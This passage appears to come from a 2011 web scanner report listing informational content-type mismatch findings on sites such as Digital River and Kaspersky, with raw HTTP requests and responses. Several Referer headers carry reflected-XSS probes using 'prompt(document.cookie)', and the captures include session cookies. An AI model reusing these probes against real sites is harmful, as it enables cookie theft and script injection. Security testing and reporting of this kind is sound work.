................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222......N.A.."..............................
...[SNIP]...

26.10. https://chat.livechatinc.net/licence/1019931/tunnel.cgi previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://chat.livechatinc.net
Path:	/licence/1019931/tunnel.cgi

Issue detail

The response contains the following Content-type statement:

Content-type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 200 OK
Content-type: text/html
Content-Length: 21
Connection: Keep-Alive

IWCS0089R^^^^0^0^^1

26.11. http://corporate.digitalriver.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://corporate.digitalriver.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145843969; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; fcC=X=C708273219&Y=1315145843991&FV=10&H=1315145843969&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054

Response

HTTP/1.1 200 OK
ETag: "37e-4b6b21a0"
Content-Type: text/plain
Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=19732;ecid=23859429193,0)
Content-Length: 894
Date: Thu, 26 May 2011 19:48:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app58
Accept-Ranges: bytes

..............h.......(....... ...............H...H...........................................................VVW


                                                                                       .....tOL+.


                                       ...Q.

...[SNIP]...

26.12. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css;charset=UTF-8

The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /store/digriv/en_US/DisplayPage/ThemeID.16015700/id.TopHeaderPopUpCssStylePage HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store?Action=DisplayProductSearchResultsPage&SiteID=digriv&Locale=en_US&ThemeID=16015700&CallingPageID=CorpPage&keywords=xss&x=0&y=0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; fcPT=http%3A//corporate.digitalriver.com/store/digriv/Corp/sectionName.company/subSectionName.aboutUs/page.aboutUs; op_browser=safari_535.1; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fcorporate.digitalriver.com%2Fstore%2Fdigriv%2FCorp%2FsectionName.company%2FsubSectionName.aboutUs%2Fpage.aboutUs; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.4.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.4.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145949666; fcC=X=C708273219&Y=1315145949793&FV=10&H=1315145949666&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=2&E=201359&F=0&I=1315145947293

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/css;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=139823604095,0)
Date: Sun, 04 Sep 2011 14:18:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app53
Content-Length: 6623


<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=digriv&ThemeID=16015700&ceid=1755819
...[SNIP]...

26.13. http://corporate.digitalriver.com/store/digriv/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://corporate.digitalriver.com
Path:	/store/digriv/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css;charset=UTF-8

The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /store/digriv/en_US/DisplayPage/id.TopHeaderPopUpCssStylePage HTTP/1.1
Host: corporate.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/digriv/html/pbPage.Homepage?resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1315145806740
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; ORA_WX_SESSION="10.1.2.197:260-0#0"; JSESSIONID=FDCBEABE0227856E4B45473D1B48DB8F; BIGipServerp-drh-dc1pod5-pool1-active=3305242890.260.0000; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; fcOOS=fcOptOutChip=undefined; fcR=http%3A//www.digitalriver.com/; fcPT=http%3A//corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home; VISITOR_ID=971D4E8DFAED43674226FBB5874B1E2464458604C3469C26; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.1.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.2.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf; fcP=C=0&T=1315145843991&DTO=1315145843969&U=708273219&V=1315145848307; fcC=X=C708273219&Y=1315145848489&FV=10&H=1315145848307&fcTHR=www.digitalriver.com}www.drcorporate.com,store.digitalriver.com}www.store-dr.com&Z=0&E=5035601&F=0&I=1315145844054

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/css;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=131233565319,0)
Date: Sun, 04 Sep 2011 14:16:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app53
Content-Length: 6600


<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&Env=BASE&Locale=en_US&SiteID=digriv&ceid=175581900&cename=TopHeaderP
...[SNIP]...

26.14. http://drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/cm/multimedia/HomeFlash/xml/coverItems_2011-02-21.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://drh.img.digitalriver.com
Path:	/DRHM/Storefront/Site/digriv/cm/multimedia/HomeFlash/xml/coverItems_2011-02-21.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/xml

The response states that it contains XML. However, it actually appears to contain plain text.

Request

GET /DRHM/Storefront/Site/digriv/cm/multimedia/HomeFlash/xml/coverItems_2011-02-21.xml?28 HTTP/1.1
Host: drh.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/cm/multimedia/HomeFlash/main5.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389; op393dr_homepage_demogum=a04006j09d2794r06b26c1afe; op393dr_homepage_demoliid=a04006j09d2794r06b26c1afe; __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmb=94877326.2.10.1315145846; __utmc=94877326; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op393dr_homepage_demo1gum=a04e07i0a12794q0643tzdbaf; op393dr_homepage_demo1liid=a04e07i0a12794q0643tzdbaf

Response

HTTP/1.1 200 OK
ETag: "1534-4d62dc19"
Content-Type: text/xml
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=96601011012,0)
Last-Modified: Mon, 21 Feb 2011 21:41:45 GMT
Content-Length: 5428
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app74
Accept-Ranges: bytes
Cache-Control: max-age=129600
Expires: Tue, 06 Sep 2011 02:17:39 GMT
Date: Sun, 04 Sep 2011 14:17:39 GMT
Connection: close


<coverFlow stylePath="http://drh.img.digitalriver.com/DRHM/Storefront/Site/digriv/cm/multimedia/
...[SNIP]...

26.15. http://drh.img.digitalriver.com/store previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://drh.img.digitalriver.com
Path:	/store

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css;charset=UTF-8

The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /store?Action=DisplayContentManagerStyleSheet&SiteID=driv&StyleID=764100&StyleVersion=116&styleIncludeFile=style.css HTTP/1.1
Host: drh.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://corporate.digitalriver.com/store/driv/en_US/ContentTheme/pbPage.Homepage/sectionName.home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x278vq07m15wd278vr08s2xm1011; op646kaspersky_us_storepageliid=a01603h0892794r05t3df82794r05y3aoe389

Response

HTTP/1.1 200 OK
ETag: W/"20758-1286918465000"
Content-Type: text/css;charset=UTF-8
Last-Modified: Tue, 12 Oct 2010 21:21:05 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=7200+0;age=4869;ecid=21643651097,0)
Content-Length: 20758
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app54
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 14:17:34 GMT
Date: Sun, 04 Sep 2011 14:17:34 GMT
Connection: close

/*
##############################################
# SITE WIDE STYLES #
# Add any styles which would be site-wide #
# here. These can include error styles, list #
# st
...[SNIP]...

26.16. http://i.haymarket.net.au/Utils/ImageResizer.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://i.haymarket.net.au
Path:	/Utils/ImageResizer.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /Utils/ImageResizer.ashx?n=http%3a%2f%2fi.haymarket.net.au%2fNews%2fkasperskyxss.jpg&w=440&c=1 HTTP/1.1
Host: i.haymarket.net.au
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 10615
Content-Type: image/jpeg
Expires: Wed, 07 Sep 2011 12:12:56 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
content-disposition: inline; filename=1_0_440_http://i.haymarket.net.au/News/kasperskyxss.jpg
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 12:12:55 GMT

......JFIF.....`.`.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222..........."..............................
...[SNIP]...

26.17. http://news.gmane.org/find-root.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://news.gmane.org
Path:	/find-root.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /find-root.php HTTP/1.1
Host: news.gmane.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

26.18. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

26.19. http://office.microsoft.com/search/toc14.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://office.microsoft.com
Path:	/search/toc14.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

26.20. http://rt.disqus.com/forums/realtime-cached.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.disqus.com
Path:	/forums/realtime-cached.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /forums/realtime-cached.js?timestamp=2011-09-04_08:13:17&thread_id=401749726&f=scmagazine&1315138450709 HTTP/1.1
Host: rt.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: disqus_unique=608614822849; __qca=P0-943627109-1315055753168; __utma=113869458.1840189074.1315055753.1315100729.1315138435.4; __utmb=113869458.1.10.1315138435; __utmc=113869458; __utmz=113869458.1315138435.4.4.utmcsr=scmagazine.com.au|utmccn=(referral)|utmcmd=referral|utmcct=/News/268907,kaspersky-website-vulnerable-to-xss.aspx

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 12:15:06 GMT
Content-Type: application/x-javascript
Content-Length: 67
Last-Modified: Mon, 17 Jan 2011 19:57:15 GMT
Connection: close
Accept-Ranges: bytes

DISQUS.dtpl.actions.fire("realtime.update", "2010-12-08_19:48:43")

26.21. http://rt.trafficfacts.com/tf.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://rt.trafficfacts.com
Path:	/tf.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tf.php HTTP/1.1
Host: rt.trafficfacts.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Content-Length: 5
Connection: close
Content-Type: text/html; charset=UTF-8

Done

26.22. http://s0.2mdn.net/2524173/BRAND_CDWG_DEFAULT_NA_728x90_A.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://s0.2mdn.net
Path:	/2524173/BRAND_CDWG_DEFAULT_NA_728x90_A.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /2524173/BRAND_CDWG_DEFAULT_NA_728x90_A.jpg HTTP/1.1
Host: s0.2mdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkworld.com/?ba876%27-prompt(document.cookie)-%276d0de08921e=1

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Wed, 17 Aug 2011 22:06:20 GMT
Date: Sun, 04 Sep 2011 14:18:55 GMT
Expires: Mon, 05 Sep 2011 14:18:55 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 9168
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1657

GIF89a..Z.......................==. ......."".............mm.yy.II.DD.......ff.......}}.YY.55.............QQ.ii.UU......................AA.............qq.--.............))................^^....33....
...[SNIP]...

26.23. http://sophelle.app5.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://sophelle.app5.hubspot.com
Path:	/salog.js.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.24. http://spd.pointroll.com/Platform/PRScript.svc/PRScript previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://spd.pointroll.com
Path:	/Platform/PRScript.svc/PRScript

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /Platform/PRScript.svc/PRScript?v=129&pos=0&init=0&delay=0&push=0&set=2&bye=1 HTTP/1.1
Host: spd.pointroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315163667&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-storedigitalrivercom.html&dt=1315145667732&bpp=3&shv=r20110824&jsv=r20110719&correlator=1315145667845&frm=4&adk=1607234649&ga_vid=1465475066.1315145668&ga_sid=1315145668&ga_hid=849475373&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&adx=8&ady=284&biw=1033&bih=894&eid=36887102&fu=0&ifi=1&dtd=245&xpc=QlLdMrIDQr&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRbu=ErB40RtCA; PRgo=BBBAAsJvBBVBF4FR

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-AspNet-Version: 2.0.50727
Content-Type: text/plain
Content-Length: 11848
Cache-Control: private, max-age=405398
Date: Sun, 04 Sep 2011 14:17:24 GMT
Connection: close

/*PointRoll.2011 v129*/var priw,prih,prz=0,przo=0,prsw=0,prrv=0,prpi=0,prtg=0,prta=1,prpc='',prpf,prcw,prad=0,prca=0,prff=0,prmh=0,prup=0,proto,proto2,prbf=0,proo=0,prgo=0,pria=0,prpdts,prpot=0,prFlag
...[SNIP]...

26.25. http://st.madisonlogic.com/images/userlogo/2/2745_INFOR-Logo-2010.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://st.madisonlogic.com
Path:	/images/userlogo/2/2745_INFOR-Logo-2010.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/userlogo/2/2745_INFOR-Logo-2010.gif HTTP/1.1
Host: st.madisonlogic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itwhitepapers.com/index.phpb5ac2%22-prompt(%22Fool%22)-%221c3a60ce1ff
Cookie: __utma=15425322.657461619.1313187593.1313187593.1313197931.2; __utmz=15425322.1313197931.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:19 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 03 Jan 2011 20:40:26 GMT
ETag: "5dd01f-cae-296a0280"
Accept-Ranges: bytes
Content-Length: 3246
Connection: close
Content-Type: image/gif

.PNG
.
...IHDR...s.........8&p.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.... %.........ddd.........///. &.......x{

eee....tx...###.........MMM......DDD.....
...[SNIP]...

26.26. http://st.madisonlogic.com/images/userlogo/3/3587_scality_logo.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://st.madisonlogic.com
Path:	/images/userlogo/3/3587_scality_logo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/userlogo/3/3587_scality_logo.jpg HTTP/1.1
Host: st.madisonlogic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itwhitepapers.com/index.phpb5ac2%22-prompt(%22Fool%22)-%221c3a60ce1ff
Cookie: __utma=15425322.657461619.1313187593.1313187593.1313197931.2; __utmz=15425322.1313197931.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:19 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Fri, 12 Aug 2011 19:48:07 GMT
ETag: "5da638-2ca1-313e8bc0"
Accept-Ranges: bytes
Content-Length: 11425
Connection: close
Content-Type: image/jpeg

.PNG
.
...IHDR...s...<.....UM._....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<... pHYs...6...".QN'$..,
IDATx^.}wX...>.s..yN..9..9...{...&....^c.%.F..&...
.."...R,..)
.{....
...[SNIP]...

26.27. http://st.madisonlogic.com/images/userlogo/5/596_interactive-intelligence.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://st.madisonlogic.com
Path:	/images/userlogo/5/596_interactive-intelligence.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/userlogo/5/596_interactive-intelligence.jpg HTTP/1.1
Host: st.madisonlogic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itwhitepapers.com/index.phpb5ac2%22-prompt(%22Fool%22)-%221c3a60ce1ff
Cookie: __utma=15425322.657461619.1313187593.1313187593.1313197931.2; __utmz=15425322.1313197931.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:47:19 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 30 Jun 2011 19:19:57 GMT
ETag: "5dda69-47aa-c9561140"
Accept-Ranges: bytes
Content-Length: 18346
Connection: close
Content-Type: image/jpeg

.PNG
.
...IHDR...s...s......C=.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<... pHYs............R..G.IDATx^....U......^..z.N..QI.......C.Q@....4.....@.....>.._g....3sf...
...[SNIP]...

26.28. https://store.digitalriver.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://store.digitalriver.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

26.29. http://support.kasperskyamericas.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://support.kasperskyamericas.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: support.kasperskyamericas.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 13:56:09 GMT
Server: Apache
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

26.30. http://support.kasperskyamericas.com/sites/default/files/kaspersky_usatheme_favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://support.kasperskyamericas.com
Path:	/sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/default/files/kaspersky_usatheme_favicon.ico HTTP/1.1
